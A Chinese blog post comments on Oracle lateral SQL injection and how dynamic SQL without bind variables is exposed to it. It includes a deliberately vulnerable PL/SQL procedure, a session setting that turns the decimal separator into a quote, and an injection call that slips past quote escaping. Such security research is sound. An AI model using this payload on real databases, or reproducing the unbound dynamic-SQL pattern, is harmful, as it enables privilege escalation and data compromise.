ORACLE LATERAL-SQL-INJECTION 个人见解

最新推荐文章于 2024-04-08 22:17:28 发布
最新推荐文章于 2024-04-08 22:17:28 发布
阅读量3.2k 收藏
点赞数
文章标签: oracle session sql date insert 存储
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/I_S_T_O/article/details/2347569
版权
原PAPER地址:http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf           author : kj021320          team :  I.S.T.O            最近忙啊忙啊的,今天终于有点点时间抽出来看看技术文章了,最近国外又出了关于新型ORA注入技术的PAPER,赶紧测试,主要是出现在SQL语句字符拼接的时候,DATE类型转换为VARCHAR 以及 NUMBER转换为VARCHAR加入的格式字符出现问题。如果直接执行SQL语句或者参数绑定则不用担心太多,如以下ORACLE存储过程create or replace procedure kjdatepoc(date d)asbegin       insert into kjdatetable values(d);           commit;end;根本不需要担心遭受到SQL新型注入攻击,那么在什么地方会发生DATE 以及 NUMBER的注入攻击呢!?一般都是采用了动态SQL而又不采用参数绑定的语句。例如工程师经常用的DBMS_SQL或者EXECUTE IMMEDIATE看以下存储过程create or replace procedure kjdatepoc(date d)asbegin       execute immediate 'insert into kjdatetable values('|| d ||')';       commit;end;那么遇到以上的存储过程或者函数等,也通过修改SESSION中的NLS_DATE_FORMAT中的值达到SQL注射的目的,老外的PAPER讲解得非常详细了 ,我在这里也不废话。惟独对于 NUMBER类型的注射没有多作讲解 只是简单演示了可以输出单引号!看以下语句ALTER SESSION SET NLS_NUMERIC_CHARACTERS='''.';SELECT to_number(1000.10001,'999999D99999')||'' FROM DUAL;输出一下结果1000'10001只是多了一个单引号,那有什么用呢?乐观的来说!在特定情况下是很有价值的!看以下一个存储过程create or replace procedure NumInjPoc(kjexpnum number,kjexpstr varchar2)isSecStr varchar2(1000);beginSecStr:=replace(kjexpstr,'''','''''');sys.dbms_output.put_line('SELECT * FROM DUAL WHERE ID='||kjexpnum||' and name='''||SecStr||'''');end;内部对varchar类型进行替换了!我们可以进行测试begin       numinjpoc(1000,'''--');end;其输出SQL语句为SELECT * FROM DUAL WHERE ID=1000 and name='''--'单引号被转义掉了那么如果我们结合这个NUMBER类型怎么进行注射呢?ALTER SESSION SET NLS_NUMERIC_CHARACTERS='''.';begin       numinjpoc(TO_NUMBER(0.10001,'999999D99999'),'||kj.exp()--');end;看看输出结果SELECT * FROM DUAL WHERE ID='10001 and name='||kj.exp()--'这样就可以间接的攻击它…在某中程度才来需要ALTER SESSION 配合后,再去攻击系统内部的一些函数或者过程来提升权限。未尝不是一种好的突破思路,但是对于单语句进行SQL注射攻击,以结果为向导的话!这样的方式没多大作为。
I_S_T_O
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
lateral函数oracle,ORACLE LATERAL-SQL-INJECTION 个人见解
weixin_42651748的博客
04-12 408
如果直接执行sql语句或者参数绑定则不用担心太多,如以下ORACLE存储过程createorreplaceprocedurekjdatepoc(dated) as begin insertintokjdatetablevalues(d); commit; end; 根本不需要担心遭受到sql新型注入攻击,那么在什么地方会发生DATE以及NUMBER的注入攻击呢!?一般都是采用了动态sql而又不采用...
lateraloracle中用法,查看Oracle的执行计划一句话命令 电脑资料
weixin_42511557的博客
04-15 409
查看Oracle的执行计划一句话命令 电脑资料set autotrace onORACLE数据库查看执行计划的方法Oracle中获取执行计划的几种方法分析QQ空间 搜狐微博 人人网 开心网 百度搜藏更多Tags:查看Oracle的执行计划一句话命令复制链接收藏本文打印本文关闭本文返回首页上一篇:Oracle下时间转换在几种语言中的实现下一篇:Oracle row_number() over()解析...
Hive SQL 中ARRAY或MAP类型数据处理:lateral view explode()/posexplode()——行转列函数
Zheng_Tito的博客
01-19 6221
在对表数据进行批量处理过程中,常常碰上某个字段是一个array或者map形式的字段,一列数据的该字段信息同时存在多个值,当我们需要取出该数组中的每一个值实现一一对应关系的时候,可以考虑使用lateral view explode()/posexplode() 进行处理。
Vehicle-Dynamics-Lateral:OpenVD
05-26
《车辆动力学-横向:MATLAB的开源仿真包——OpenVD》 在现代汽车工程领域,车辆...通过下载并解压“Vehicle-Dynamics-Lateral-master”压缩包,你将获得完整的OpenVD源代码和相关文档,开始你的车辆动力学探索之旅。
PyPI 官网下载 | lateral-0.0.2.tar.gz
01-12
《PyPI官网下载:lateral-0.0.2.tar.gz——深入了解Python库的发布与使用》 在Python的世界里,PyPI(Python Package Index)是开发者们分享和获取开源软件包的重要平台。今天,我们要关注的是PyPI上的一款名为...
Beery-The-Industrial-Revolution-Of-Lateral-Movement.zip
10-25
标题“Beery-The-Industrial-Revolution-Of-Lateral-Movement.zip”暗示了这个压缩包内容可能与工业革命时期横向运动或技术转移有关。描述中的相同短语进一步强调了这一主题,这通常指的是在18世纪末至19世纪期间,...
lateral函数oracle,[2016026]12c lateral语法.txt
weixin_39835925的博客
04-12 551
[2016026]12c lateral语法.txt12c 支持一种LATERAL的写法,例子:SELECT e1.*, e3.avg_salFROM scott.emp e1,LATERAL (SELECT AVG (e2.sal) avg_salFROM scott.emp e2WHERE e1.deptno != e2.deptno) e3;-- 显示emp每行,同时显示其它不是本部门的平均...
oracle数据库
qq_62553456的博客
11-23 886
加油 希望将来的你更好
Hive SQL中的 lateral view 与 explode(列转行)以及行转列
热门推荐
积一时之步,臻千里之遥程
03-28 4万+
文章目录一、列转行Explode炸裂函数posexplode()函数Lateral View例子1例子2例子3例子4——多列炸裂 Posexplode例子5二、行转列例子1例子2 一、列转行 行转列:将多个列中的数据在一列中输出 列转行:将某列一行中的数据拆分成多行 Explode炸裂函数 将hive某列一行中复杂的 array 或 map 结构拆分成多行(只能输入array或map) 语法 explode(col) select explode(arraycol) as newcol from tabl
SQLLATERAL VIEW 的用法
m0_37682176的博客
08-17 1699
SQL通过LATERAL VIEW 实现列转多行
Hive SQL中的列转行(lateral view与explode)、行转列
weixin_49709859的博客
01-30 6787
列转行、行转列的灵活运用
HiveSQLlateral view
最新发布
指针先生
04-08 524
lateral view是hiveQL中的一个高级功能,用于和表生成函数一起,来处理嵌套数组和结构的数据,特别是在处理复杂的数据结构如JSON或数组内嵌套数组时特别有用。它允许用户在每一行上应用TGF(表生成函数),将生成的元素作为多行返回,或者多列返回。
2023.11.16-hive sql高阶函数lateral view,与行转列,列转行
白白的wj的博客
11-15 4980
hive函数主要功能是将原本汇总在一条(行)的数据拆分成多条(行)成虚拟表,再与原表进行笛卡尔积,从而得到明细表。配合UDTF函数使用,一般情况下经常与explode函数搭配,explode的操作对象(列值)是ARRAY或者MAP,可以通过split函数将 String 类型的列值转成ARRAY来处理。
oracle单表数据量大怎么优化_大数据量多维度报表统计的SQL优化方法
weixin_39705193的博客
12-05 1688
在短视频项目开发中曾经遇到过一个SQL优化的问题,SQL是实现多维报表的统计,有8个维度,有曝光、点击、播放几种行为的pv、uv统计,此类需求也比较常见。 需求如下: 需求有9个维度,报表是每天统计,日期等于统计周期,常量,可以不考虑,剩下还有8个维度(国家、系统、版本、用户类型、实验名称、实验分组、行为入口、是否点击push)。...
如何使用SQL查找最近的子集总和
danpu0978的博客
04-24 259
最近,我偶然发现了关于堆栈溢出这个非常有趣的问题。 标题是: [如何]比较数字和数字子集的总和 在本文中,我们将把用户的命令式方法与极其优雅的(OracleSQL方法进行比较。 我们将利用这些出色的SQL功能的任意组合: 视窗功能 FIRST和LAST函数 ,使用特定于Oracle的语法 LATERAL JOIN (或APPLY 递归SQL 问题 提出这...
SQL数据单条转多条(Lateral View
weixin_30362083的博客
07-26 468
Lateral View和split,explode等UDTF一起使用,它能够将一行数据拆成多行数据,并在此基础上对拆分后的数据进行聚合。 单个Lateral View语句语法定义如下:lateralView: LATERAL VIEW [OUTER] udtf(expression) tableAlias AS columnAlias (',' columnAlias) * fromClaus...
oracle lateral
05-17
Oracle Lateral is a feature introduced in Oracle 12c that allows you to reference columns from a table or subquery that appear later in the SQL statement. This allows you to write more efficient queries that can avoid the need for subqueries or self-joins. The syntax for using Lateral in Oracle is as follows: ``` SELECT * FROM table1 LATERAL (SELECT column2 FROM table2 WHERE table2.column1 = table1.column1) ``` In this example, the Lateral clause is used to reference a column from table2 that is related to a column in table1. This eliminates the need for a separate subquery or join. Lateral can also be used with subqueries, allowing you to reference columns from a subquery that appears later in the SQL statement. This can be useful for complex queries that involve multiple subqueries or joins.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值